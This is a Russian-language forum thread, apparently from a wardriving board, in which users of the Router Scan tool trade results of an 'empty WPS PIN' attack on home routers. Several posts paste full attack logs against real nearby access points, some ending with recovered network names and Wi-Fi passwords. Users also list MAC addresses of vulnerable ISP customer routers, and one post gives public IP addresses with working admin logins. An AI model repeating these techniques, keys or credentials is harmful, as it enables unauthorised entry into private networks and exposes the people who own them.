прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,510
    Likes Received:
    9,457
    Reputations:
    118
    Что ещё раз доказывает, что вы не читаете пост, а смотрите картинки. o_O

    Я же дал ссылку на свой пост, а не на пост с картинкой:
    Прямо как в той притче с чёрной точкой посреди белого листа - самого листа никто не видит, все видят точку...
     
    4Fun, sha9, Payer and 1 other person like this.
  2. PSYDRUGS

    PSYDRUGS Member

    Joined:
    1 Sep 2011
    Messages:
    203
    Likes Received:
    38
    Reputations:
    0
    Тогда пишите конкретно, где нужно сделать одну пустую строчку? Скриншот ничего такого не содержит, приходится домысливать за Вас. Или это касается консольной утилиты PixieWps?
    Четкое описание алгоритма (Вам ли это не знать, как автору программы), ключ к понимаю и отсутствию наводящих вопросов у пользователей и поклонников продукта.

    [​IMG]
    [​IMG]
     
  3. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,510
    Likes Received:
    9,457
    Reputations:
    118
    Не смотрите на скриншот, он вообще имеет лишь косвенное отношение.

    Человек, запостивший скриншот, просто сделал надпись для того, чтобы было понятно, что он использовал пустой пин. А на деле пустая строка (один перенос строки) должен быть именно там.
     
    sha9, Payer, Triton_Mgn and 1 other person like this.
  4. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,510
    Likes Received:
    9,457
    Reputations:
    118
    @PSYDRUGS и вот вам скриншот, чтоб наверняка:

    [​IMG]

    (а то уже устал ждать, действительно ли там пустой пин)
    Сейчас стоит стратегически важная задача - выяснить, у каких девайсов имеется таковой, поэтому можно и потерпеть.
     
    GrayFoxy, sha9, leonid2012lnv and 7 others like this.
  5. PSYDRUGS

    PSYDRUGS Member

    Joined:
    1 Sep 2011
    Messages:
    203
    Likes Received:
    38
    Reputations:
    0
    Большое вам человеческое спасибо. Теперь всё ясно и понятно. С серкомовскими гпон в частности с RV6688v2 успеха с пустым PIN не добился,
    однако есть и позитивные моменты, с первой попытки вскрыл точку WiFire_2.4G_2847B5, NBN, которая постояно уходила в лок, с пустым PIN.
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 5AE7D1F4069B2C1D274986D23196D903
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: NetByNet
    [*] Model Name: S1010
    [*] Serial Number: S1010
    [*] Device Name: S1010
    [*] Sending WPS Message M2...
    [*] R-Nonce: 2553A5E66C9D0D19C058A72D5D0A849A
    [*] PKR: 98C89E82E310B4C75858ED2D143EED7DB0DE95B7C29E5A69CC027CA2D037BF75E2CB0E2A297AA3D15986A9FB7994DDB68869435A60B0225908F99437A5AAFA1CABCF350381818086E80BAE6F93FCACF5F9E827C3164DC080003BBEC140DF9AA1DF97667FCA040176C912CCBE52F8AC8B034F8A62B68240000FEC93A6D8C39142B14612C54D61A5C0E0029A37D7D4251FAAD93E0097FAE506EF996D4A020C8ACAF430414CA6FCE280DBEC8C3FED663C616681ABAD540CF6E726DF9210FD079E95
    [*] AuthKey: F264C17F19979F9D7F9C78C7BF8CEAE7B4C214AAE7C8F334F8D3992E3B8659FF
    [*] Received WPS Message M3.
    [*] E-Hash1: 5212CA1ECE5703E2F2A44F73223E157B1D011495E38795FF59056C3B3CD3B573
    [*] E-Hash2: 5212CA1ECE5703E2F2A44F73223E157B1D011495E38795FF59056C3B3CD3B573
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [+] WPS PIN: <empty>
    [+] SSID: WiFire_2.4G_2847B5
    [+] Key: WBbRuu36
    [+] Key Index: 1
    [*] Audit stopped.
    Ещё 2 точки с пустым PIN: DIR-825AC, MAC: 10:BE:F5:87:53:E1 и ZXNH H118N MAC: 74:B5:7E:17:3E:14, от Ростелеком.

    Что означает ошибка [-] Unknown error: 000B - заблокированный WPS? Дальше M2 пакета дело не идёт, сигнал очень хороший.
     
    #4505 PSYDRUGS, 19 Sep 2017
    Last edited: 19 Sep 2017
    hydra, Kakoluk, Mednik and 4 others like this.
  6. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,510
    Likes Received:
    9,457
    Reputations:
    118
    Большое спасибо за информацию, она очень ценная! (без сарказма) :)
    Какой-то глюк на стороне точки. А какая модель?

    [​IMG]
     
  7. CRACK211

    CRACK211 Well-Known Member

    Joined:
    16 Sep 2009
    Messages:
    870
    Likes Received:
    924
    Reputations:
    4
    Можно попросить вас добавить в уберфичу отображение всех паролей из 3wifi?)
     
  8. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,510
    Likes Received:
    9,457
    Reputations:
    118
    [​IMG]
     
    Dj-SeReDa, sha9, carartem02 and 3 others like this.
  9. CRACK211

    CRACK211 Well-Known Member

    Joined:
    16 Sep 2009
    Messages:
    870
    Likes Received:
    924
    Reputations:
    4
    Это я знаю) спасибо ) я к тому что в базе к одной точке есть по несколько паролей, а отображается только один
     
  10. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,510
    Likes Received:
    9,457
    Reputations:
    118
    Может что-нибудь придумаю. Пока выводится только самый свежий.
     
  11. PSYDRUGS

    PSYDRUGS Member

    Joined:
    1 Sep 2011
    Messages:
    203
    Likes Received:
    38
    Reputations:
    0
    RTL8671 по идее должен прокатывать алгоритм с пустым PIN, но такое впечатление что заблокирован перебор.
    На GPON ZTE F660, EAP сессия сбрасывается после M2, но там ошибка: (-) Unknown error 0000.
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 5829F54B2AA73C25495DB703279A4B96
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: RTL8671
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: Internet Router Device
    [*] Sending WPS Message M2...
    [*] R-Nonce: 859B608716A0F2B7A9BE27BCDB01BE68
    [*] PKR: 13E082ED9034111B127D49AE9FA3D33F3C7BD2BA9DA4ED486B60C45AFCDDE2E9E141FB769DD77C6AE253CFC3333715599B0BEDFF66C0BBF54D429AD882CA4B03A77477D591ED06A432D509C611B9B309747550F138A8FDF36639D1733C6720BDB6E9DEE322795DA2EAB1A0984812DEAEF30257B897D9F224C3D68AF468B7B2980C7406428388CFEBA8528B5CD5D3C199F49E72BC5D7A93C14E0E92B436F9916DE0CC39C6793CAEADF89ECCE1DD438BB545E5EE5D12C73E342A99B01911F849E2
    [*] AuthKey: F00B83591BA9256E4E99E4032BB6260ED07B3C667CB08BEDD1C919C38ADDC25D
    [*] Received WSC NACK.
    [-] Unknown error 000B.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 5979668F313C642D73D4DF9B1CA47486
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Sending WPS Message M2...
    [*] R-Nonce: 2FC38B5CB8F8C0FF64145482A4B4309B
    [*] PKR: AC67897FBE661FB9396B7CB672E4254D8CED1CEFAFA4EBD9A84FF5619DFE8996A99EE81681AA3AB2C0DB6F3AC9DC03F0F72B47005FFA5E327790CC35AAB420C7A447827393047ADE9648C1D009ECB0E159590CCD50CFB42395CAC6B55F14698747E25EF961448FFB768DA8B7A8118FAB3CE5181F64C22F8B11593943B9351E2E5D36173DBB7ABC87977F83857C441BB866B3C4865CF7E9A576F837F32C6D496E4FBC380F558B3D1BA68878789FB6D4CF4AE3AD8B86BCD039E607989D9566665C
    [*] AuthKey: 7FA28EC0F50F77359BFCB3993471C5ECF5F1D9A91264B197ED37EFF48E5AFDF1
    [*] Received WSC NACK.
    [-] Unknown error 000B.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [*] Associating with AP...
    [*] Audit stopped.
     
  12. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    985
    Likes Received:
    1,702
    Reputations:
    20
    Не всегда и не везде. ANUS DSL-N10E неуязвим.
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 0000054900003215000068E800006EF6
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] R-Nonce: 667EF5C0EF2DBC567598BC4E2BB43925
    [*] PKR: D4970C4AF53F62ADD84844A39204EACA280A4E307FF93BDE1FE795869CB90B0202A3F94D164592BFB3508125C7E281F81C5CFFDEF29AF6AE3C9BF0310D34CFE4B59CD6138B1228807164306EA7347756B68F030A74CD94BC60702F1130F835E8B74C59E7E72FA0951B86F6761B174B598A699CFB9E279699FFDE1FEA9EA8A08156171C16A0E9757B44B4A262D8F44FE550CE12991AF06556E22A4B7339644E9CBE29373F93F801B38EE72DFA53677E8779BAF9899179A0CA56C2D17B701B0C75
    [*] AuthKey: 3F3303AC6584CDA3A9DDFE54CEA197CBEF3D23B2D4B24A5015CD00DD9C929F8A
    [*] Received WPS Message M3.
    [*] E-Hash1: 3B8173FFB0BE32F3DC3338CE99ADC76DC89B39B02BB4B7176D8B5F3D79F98F5F
    [*] E-Hash2: BFEB10CE495FFE856F7AE78FE88B8895070E538FD4C6D939169BB83ECA125197
    [*] Sending WPS Message M4...
    [*] Received WSC NACK.
    [-] Error: Wrong PIN code.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [*] Audit stopped.
     
    sha9 likes this.
  13. PSYDRUGS

    PSYDRUGS Member

    Joined:
    1 Sep 2011
    Messages:
    203
    Likes Received:
    38
    Reputations:
    0
    Печалька. Ещё один из иследованных на уязвимость пустого PIN, D-Link DIR-620 MAC: EC:22:80:FA:AD:61.
    Больше просканировать не смогу, нужно антенну менять на Yagi или сменить текущее местоположение.
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 660C0DFF12F9BDC677A0E6BE2BD66B76
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: D-Link Systems
    [*] Model Name: DIR-620
    [*] Model Number: DIR-620
    [*] Serial Number: 123456789012347
    [*] Device Name: DIR-620
    [*] Sending WPS Message M2...
    [*] R-Nonce: 5BEF3FD53F7533978E4D619760F93935
    [*] PKR: 72EEEDCB5B4D40FEBB4C5CCC6DD6B8EA522FE1D3907CCABDBC8B664E2F259324702718068AAD99CE57EA3C12A6D5F0008197D3A7FED3F43D1F564EC4E22A09BE9C7C3F688645E37F54F784BEAC28ED0BC47EF3714AFE0ADD5F4C4F61F14A4C31E5902C310858DB07F0C9AE08DA14A0159FDE51A3D8C19F936B96C8F61F506C652EF0D1366A40B969FC891059DCD96F9CB5D629FF55650319BBD64E7AE8A4858B82D9D55D8B91E83189C927C51E5F06F2FACFE264DFEC6CD0C5A0241ABA384754
    [*] AuthKey: 1AE8737538B55CF224442E4ACC0303B67C7755919B63623FF602BA59FB21C855
    [*] Received WPS Message M3.
    [*] E-Hash1: FE0F3F47602EE04D7805670A256EFE14CB3BF7806F2013FBE54E2812FC9541DC
    [*] E-Hash2: FE0F3F47602EE04D7805670A256EFE14CB3BF7806F2013FBE54E2812FC9541DC
    [*] Sending WPS Message M4...
    [*] Received WPS Message M3.
    [*] E-Hash1: FE0F3F47602EE04D7805670A256EFE14CB3BF7806F2013FBE54E2812FC9541DC
    [*] E-Hash2: FE0F3F47602EE04D7805670A256EFE14CB3BF7806F2013FBE54E2812FC9541DC
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [+] WPS PIN: <empty>
    [+] SSID: onlime_100
    [+] Key: 9661108807
    [+] Key Index: 1
    [*] Audit stopped.
     
  14. leonid2012lnv

    leonid2012lnv Member

    Joined:
    10 Mar 2017
    Messages:
    24
    Likes Received:
    10
    Reputations:
    0
    Всем привет.ADSL Modem/Router ZTE ZXHN H108N наконец-то поддался ,как и предполагали,пустой PIN(<empty>) Сработала ночная сборка ! С КАЛИ так и не смог добиться результата,но отношу это к кривизне своих ручек.
     
    #4514 leonid2012lnv, 21 Sep 2017
    Last edited: 21 Sep 2017
    sha9, binarymaster and CRACK211 like this.
  15. antis17

    antis17 Well-Known Member

    Joined:
    25 Apr 2017
    Messages:
    139
    Likes Received:
    930
    Reputations:
    5
    Не парсит данные.

    Cisco Linksys WRT54GCv3
    86.100.77.18:8080 admin:123456

    [​IMG]
     
    Kakoluk, sha9, Upsurt and 1 other person like this.
  16. antis17

    antis17 Well-Known Member

    Joined:
    25 Apr 2017
    Messages:
    139
    Likes Received:
    930
    Reputations:
    5
    94.240.220.50:80 admin:slayerlan
    94.240.220.115:80 admin:slayerlan
    94.240.220.182:80 admin:slayerlan

    [​IMG]
     
  17. Gashek

    Gashek Well-Known Member

    Joined:
    16 Feb 2017
    Messages:
    220
    Likes Received:
    739
    Reputations:
    13
    Подтверждаю ZXNH H118N успешно сдался,
    DIR-825AC пока не поддаётся, возможно из за не стабильного сигнала.
     
    sha9 and binarymaster like this.
  18. exzet

    exzet Active Member

    Joined:
    26 May 2017
    Messages:
    67
    Likes Received:
    110
    Reputations:
    0
    binarymaster, не совсем очевидно, что из wps генератора пины автоматом переносятся в брут. Может пункт в меню на кнопке Море сделать?
     
  19. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,510
    Likes Received:
    9,457
    Reputations:
    118
    Какой именно пункт?

    По-моему всё вполне очевидно, эта интеграция изначально была задумана, чтобы нажимать меньше кнопок, доводя всё до автоматизма. Причём, список пинов переносится, только если генератору была задана целевая (выбранная в target) сеть.
     
    sha9 likes this.
  20. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,510
    Likes Received:
    9,457
    Reputations:
    118
    Пофиксил.
     
    sha9, Mednik, Payer and 5 others like this.
Loading...